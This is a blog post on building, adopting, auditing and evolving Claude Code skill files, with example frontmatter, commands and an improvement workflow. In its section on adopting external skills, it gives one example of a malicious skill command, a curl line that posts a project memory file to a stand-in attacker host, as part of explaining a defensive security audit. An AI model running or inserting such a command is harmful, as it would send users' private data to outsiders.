Building and evolving your own AI development skills

Skills are the most powerful part of any agentic workflow, and they’re also the easiest to get wrong. This post covers the full lifecycle: writing a skill from scratch, finding and adopting skills from the community, and closing the loop so your skills improve over time.

You’ve set up the memory system, run the heartbeat a few times, and started to feel what a directed AI session actually looks like. Now you want to push further. Maybe there’s a workflow your team runs every sprint that the AI keeps getting slightly wrong. Maybe you found a skill on GitHub that looks useful but you’re not sure if it’s safe to drop into your project. Maybe your TDD skill has drifted from how you actually run tests.

This post is about taking control of that. Not just using skills, but writing them, sourcing them, auditing them, and feeding improvements back into the system.

Part 1 of this series covered the framework itself. This post assumes you have it running and want to go deeper.

This post focuses primarily on Claude Code’s skill system (the .claude/skills/ directory format), since that’s what I use. The concepts apply to other AI coding tools that support similar skill formats, but the specific commands and file paths are Claude Code.

What a skill actually is

A skill is a markdown file with frontmatter that tells the AI agent what to do and when. That’s it. No binary, no plugin system, no build step. The intelligence comes from the AI agent; the skill provides the structure, the constraints, and the memory of how your team does things.

This distinction matters. When /dev-tdd-backend runs a test-driven development cycle, the AI agent is still doing the reasoning. The skill is the scaffold: “start with a failing test, run it, write minimal code, run it again, refactor.” Without the skill, the AI agent might write the whole feature first and add tests after. The skill holds the pattern in place.

Skills live in .claude/skills/. Each skill is a directory:

.claude/skills/
└── dev-code-review/
    ├── SKILL.md              # Required — instructions and frontmatter
    ├── references/           # Optional — detailed docs, loaded on demand
    │   └── review-criteria.md
    └── examples/             # Optional — example outputs
        └── sample-review.md

The directory name is also the command name. /dev-code-review invokes the skill. The {category}-{function} naming convention is enforced for a reason: it keeps the catalog organized and avoids collisions when you adopt skills from other sources.

Writing a skill from scratch

Start simple. Here’s a minimal skill that enforces a deployment checklist:

---
name: ops-deploy-checklist
description: >
  Run the pre-deployment checklist before any production release.
  Use when the user says "deploy", "release", "push to prod", or
  "ready to release". Does NOT trigger for test environment deploys.
disable-model-invocation: true
user-invocable: true
argument-hint: "[environment: prod|staging]"
version: 1.0.0
---

# Deploy Checklist

Run this before every production deployment.

## Step 1: Pre-flight

1. Confirm the target environment: ask if not provided
2. Run `git status` — working tree must be clean
3. Check the last CI run: `gh run list --branch main --limit 1`
4. If CI failed, stop and report — do not proceed

## Step 2: Verify

5. Run smoke tests: `dotnet test --filter Category=Smoke`
6. Check current health endpoint: `curl -s https://api.example.com/health`
7. Confirm rollback plan: "What's the last known-good version?"

## Step 3: Deploy

8. Run the deployment script: `./scripts/deploy.ps1 -Environment $environment`
9. Monitor the deployment log for 60 seconds
10. Re-check health endpoint after deployment

## Step 4: Confirm

11. Run smoke tests against the live environment
12. Log to daily memory: deployed version, timestamp, deployer
13. Update the deployment runbook if anything was different this time

A few things to notice. The description field is written like search terms, not like documentation. It specifies trigger phrases and explicitly says when NOT to trigger. That negative clause matters: without it, the AI agent might run the production checklist every time you mention “deploy to staging.”

disable-model-invocation: true means the AI agent cannot auto-trigger this skill. Only you can invoke it with /ops-deploy-checklist. For anything that touches production, that’s the right call.

Frontmatter fields you’ll use most

Field	What it controls
`name`	The `/command` name and catalog identifier
`description`	When the AI agent auto-triggers (and when not to)
`disable-model-invocation`	Set `true` for destructive or high-stakes actions
`user-invocable`	Set `false` for background conventions the AI agent applies automatically
`allowed-tools`	Restrict which tools this skill can use (`Bash(dotnet test *)`)
`context`	Set `fork` to run the skill in an isolated subagent
`version`	Track changes over time; required if you plan to contribute back
`argument-hint`	Shown in autocomplete when you type `/skill-name`

The invocation matrix

Three settings, three behavior modes. It’s worth understanding this table before you write your first skill:

Setting	User can invoke	AI agent auto-triggers	Use case
Default	Yes	Yes	Code review, explain, summarize
`disable-model-invocation: true`	Yes	No	Deploy, commit, release, delete
`user-invocable: false`	No	Yes	Background conventions, style guides

Most skills are default: both you and the AI agent can invoke them. Destructive operations should have disable-model-invocation: true. Background knowledge that the AI agent should apply silently (your team’s naming conventions, for example) gets user-invocable: false.

Naming conventions

The prefix determines the category. Pick the one that fits:

Prefix	Category
`meta-`	Framework and workflow management
`dev-`	Development tasks (TDD, code review, debugging)
`ops-`	Operations and infrastructure
`tool-`	Integrations with specific tools
`viz-`	Visualization and diagrams
`str-`	Strategy and research

If none of these fit, create a new prefix. Keep it 2-4 characters. Document it in your CLAUDE.md.

Using the Claude Code skill creator

Claude Code ships with a built-in /skill-creator that handles the full lifecycle of creating and testing skills. This is the fastest way to go from idea to working skill.

Tell it what you want: “I need a skill that runs our deployment checklist for production releases.” It drafts the frontmatter, structures the instructions, and sets up the directory. But the real value is in what comes next.

Benchmarking and trigger accuracy. The skill-creator runs evals against your skill. It tests trigger phrases that should activate the skill (“deploy to production”, “ready to release”) and verifies they do. Then it tests similar phrases that shouldn’t trigger it (“deploy to staging”, “run the tests”) and verifies they don’t. This catches the common problem of skills that activate too broadly or too narrowly.

Variance analysis. It runs the skill multiple times to check whether it produces consistent results or whether the output varies wildly between runs. A good skill should produce similar structure and quality each time, even if the specific content changes.

Iterative improvement. After benchmarking, it suggests changes to the description, the instructions, or the frontmatter settings. You apply them, benchmark again, and iterate until the skill triggers accurately and performs consistently.

This workflow applies whether you’re creating a skill from scratch or improving one you adopted from the community. Found a skill online that almost does what you need? Adopt it with /meta-adopt-skill, then run it through the skill-creator’s benchmark to see where it falls short, and improve it.

Finding skills online

You don’t have to write everything yourself. The community shares skills through GitHub repositories and the Claude Code plugin marketplace.

The `/plugin` marketplace

Claude Code has a built-in marketplace command:

# Browse what's available
/plugin

# Install from the official channel
/plugin install skill-name@claude-plugins-official

# Add a community marketplace source
/plugin marketplace add owner/repo

Skills installed from the marketplace are namespaced, so you invoke them as /namespace:skill-name. This avoids collisions with skills you’ve written locally.

Community repositories

A few collections worth bookmarking:

Repository	What’s there
anthropics/skills	Official Anthropic skills
hesreallyhim/awesome-claude-code	Curated list of skills, hooks, and tools
VoltAgent/awesome-agent-skills	500+ community skills
sickn33/antigravity-awesome-skills	1000+ skills collection

Individual skills also turn up in blog posts and documentation. The Claude Code docs maintain a reference list. When you find one you want to try, the next step is not to copy-paste it into your project blindly.

Adopting an external skill safely

Skills can execute bash commands, read and write files, and make API calls. A skill that says it “runs your test suite” could also run curl https://attacker.example.com -d @context/MEMORY.md. That’s unlikely from a well-known source, but worth checking.

/meta-adopt-skill handles this. Give it a GitHub URL or a local path and it walks through seven steps before touching anything in your project.

/meta-adopt-skill https://github.com/coleam00/excalidraw-diagram-skill

Here’s what the output looks like for a real adoption:

### Skill Adoption Review: excalidraw-diagram

**Source:** github.com/coleam00/excalidraw-diagram-skill
**Security Risk:** Low (generates HTML files, no external calls)
**Overlap:** None found in catalog
**Category:** viz
**Proposed Name:** viz-excalidraw-diagram

#### What It Does
Generates interactive Excalidraw diagrams from natural language descriptions.
Creates .excalidraw files that can be opened in Excalidraw or embedded in docs.

#### Changes Needed
- Rename from "excalidraw-diagram" to "viz-excalidraw-diagram"
- Add disable-model-invocation: true (generates files, user should control when)
- Update description trigger phrases to match this project's vocabulary

#### Recommendation
Adopt with changes

Approve? (y/n)

Nothing happens until you type y. After approval, the skill directory is created, the adapted SKILL.md is written, and the catalog is updated. The adoption decision is logged to today’s daily memory file so you have a record of what came from where.

What the security audit actually checks

The seven-step process covers:

Fetch the full skill directory, not just SKILL.md
Read every script file bundled with the skill
Check all bash commands: what exactly does it run? Any rm, any curl to external URLs?
Check allowed-tools: broad access (Bash(*)) gets flagged
Check for instructions that tell the AI agent to send data externally
Rate the risk: Low, Medium, or High
High-risk skills stop the process and require you to explicitly acknowledge the risk before proceeding

A Low rating means read-only, no bash, no external calls. Medium means scoped bash commands with no external calls. High means broad access, external URLs, or unclear scripts. The adoption will not proceed on High risk without you actively choosing to continue.

Overlap analysis

The second major check is whether the new skill would conflict with something you already have. If you have dev-code-review and you try to adopt an external dev-review-assistant, the AI agent now has two skills that activate for the same trigger phrases. That creates unpredictable behavior.

The adoption process reads your catalog.json and compares trigger phrases, function descriptions, and names. If it finds overlap, it tells you what overlaps and gives you three choices: adopt anyway (if they’re different enough to coexist), merge the new skill’s ideas into the existing one, or skip.

Managing your skill inventory

After a few months, you’ll have skills from multiple sources: some you wrote, some adopted, some from the central workflow repository. /meta-skill-catalog keeps this manageable.

Three commands cover most of what you need:

Inventory: Compare what’s on disk against what’s registered in catalog.json:

/meta-skill-catalog

This shows you skills that exist on disk but aren’t registered (you copied a directory without updating the catalog), skills registered but missing from disk (something got deleted), and skills with stale metadata.

Audit: Check for structural problems across all skills:

/meta-skill-catalog audit

The audit checks naming conventions, description quality (is it specific enough to trigger correctly?), trigger overlaps between skills, file size (over 500 lines suggests the skill should be split), and whether version fields are present.

Rebuild: When things drift, start fresh from disk:

/meta-skill-catalog rebuild

Scans every SKILL.md in .claude/skills/, reads the frontmatter, and writes a new catalog.json from scratch. Use this after bulk operations or if you suspect the catalog is out of sync.

The catalog format tracks provenance per skill: where it came from, what version was installed, and when. When the upstream workflow repository updates a skill, you can compare your installed version against the new one before deciding to upgrade.

The improvement loop

Writing a skill once is the start. Making it better over time is where the real value compounds.

The loop has four stages.

Stage 1: Detect patterns

/meta-continuous-learning reads your daily session logs and looks for recurring situations. It’s not automatic. You run it at the end of a session, or during /meta-wrap-up, and it surfaces candidates:

### Extracted Patterns

| # | Pattern | Confidence | Destination | Action |
|---|---------|-----------|-------------|--------|
| 1 | TDD skill runs unit tests first, but our integration tests need to run before coverage is meaningful | High | dev-tdd-backend | Update skill |
| 2 | Always check Aspire resource logs before restarting a service | Medium | MEMORY.md | Add to Lessons Learned |
| 3 | Use trash instead of rm for recoverable deletes | High | SOUL.md | Already there ✓ |

Apply all? Or select specific ones?

The confidence rating uses a simple rule: High means you’ve hit this pattern three or more times and confirmed it, Medium means once or twice but seems generalizable, Low means single occurrence that might be situational. Low-confidence patterns go to MEMORY.md as a note rather than immediately updating a skill.

Nothing is applied without your approval. The skill lists what it found, you decide what to act on.

Stage 2: Edit the skill

With a candidate identified, you edit the SKILL.md directly. This is just a file edit. Add the step, fix the description, reorder the phases. There’s no compilation, no deploy, no restart. The next time the skill runs, it uses the updated instructions.

One practical note: when you modify an installed skill, the session wrap-up will ask you to classify the change:

[SKILL ADAPTATION] Detected modifications to dev-tdd-backend.
Classify this adaptation? (universal / stack-specific / project-specific / skip)

Universal: Any project using this stack would benefit from this change
Stack-specific: Useful for the same stack but might need tweaking elsewhere
Project-specific: Only relevant to this project’s particular setup

This classification determines whether the adaptation should flow back to the central workflow repository.

Stage 3: Package and contribute

If a change is universal or stack-specific, it’s worth sending upstream. /meta-contribute-back handles the packaging:

/meta-contribute-back dev-tdd-backend

It reads context/adaptations.md, finds the pending contributions for that skill, reads the diff between your modified version and the original source skill, and writes a contribution file in a human-readable format — not a raw git diff, but a structured description of what changed and why. This gets committed to a contrib/your-project/dev-tdd-backend branch in the central workflow repository.

The contribution file format is intentional. A reviewer in the central repository needs to understand the motivation without having access to your project. The format includes what changed, why it was needed, what problem it solved, and any edge cases.

Stage 4: Review and merge

In the central workflow repository, /meta-merge-contributions handles the review side:

/meta-merge-contributions --list

This shows all pending contribution branches, grouped by skill. For each contribution, it shows the proposed change and asks for an action: merge, reject, or defer.

On merge, it applies the changes to the skill’s SKILL.md, bumps the version (content additions bump minor, wording fixes bump patch, structural changes bump major), appends a CHANGELOG entry with the contributing project credited, and deletes the contribution branch.

After that, projects running /meta-upgrade will see the new version available and can pull it in with version-aware diffing.

The whole loop — detect, edit, contribute, merge, distribute — means skills improve continuously across every project that uses them. A fix discovered in one project becomes available to all of them. That’s the compounding effect that makes the system worth investing in.

What the skill provides vs what the AI agent provides

There’s a question worth being clear about: when a skill works well, how much is the skill and how much is the model?

The skill provides structure and memory. It holds the workflow in place: the order of steps, the constraints, the things to check. Without the skill, the AI agent would improvise a different approach every time. With the skill, the approach is consistent.

The AI agent provides the judgment. Deciding whether a test failure is a real bug or a test setup issue, knowing when to deviate from the standard steps because the situation is unusual, writing code that fits the existing patterns in the codebase. None of that is in the SKILL.md.

This means skills don’t make a weaker model perform like a stronger one. They make any model apply your specific workflows instead of generic ones. The quality of the output still depends on the model’s capability. The consistency and specificity of the workflow depends on the skill.

It also means there’s a ceiling on how much you can fix with skills. If the AI agent keeps misunderstanding a concept, adding more steps to the skill won’t necessarily help. That’s a model limitation, not a workflow problem. The right fix there might be a rules file, a concrete example in the skill’s examples/ directory, or better context in MEMORY.md.

Putting it together

Start with one skill you’d reach for every week. A code review checklist, a deployment sequence, a documentation template. Write the SKILL.md, keep it under 100 lines at first, and run it a few times in real sessions.

Watch what it gets wrong. When the AI agent skips a step or misunderstands the intent, that’s signal. Adjust the instructions. After three or four sessions you’ll have something that fits how your team actually works, not how the documentation says you should work.

Then look outward. Browse the community repositories and the plugin marketplace. When something looks useful, run /meta-adopt-skill against it before adding it to your project. The audit takes a minute and protects you from the obvious problems.

Over time, run /meta-skill-catalog audit to check what you’ve accumulated. Skills you haven’t used in months might be worth removing. Skills with vague descriptions might be causing trigger conflicts you haven’t noticed yet. The audit makes these visible.

And when you improve a skill, classify the change. The extra thirty seconds of classification means the improvement has a path back to everyone else using the same workflow. That’s how a collection of personal productivity hacks becomes a shared team asset.

Skills are plain text files that teach an AI how to work. That’s deliberately simple. The power comes from curating them carefully, keeping them honest, and letting them evolve with what you learn.